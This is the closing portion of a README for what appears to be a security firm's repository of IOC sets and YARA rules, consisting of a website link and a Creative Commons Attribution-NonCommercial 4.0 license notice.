More information can be found at our website [https://www.hvs-consulting.de](https://www.hvs-consulting.de)
## License
![Creative Commons License](https://i.creativecommons.org/l/by-nc/4.0/88x31.png)
All IOC sets, YARA rules and other information in this repository, except created by 3rd parties, are licensed under the [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).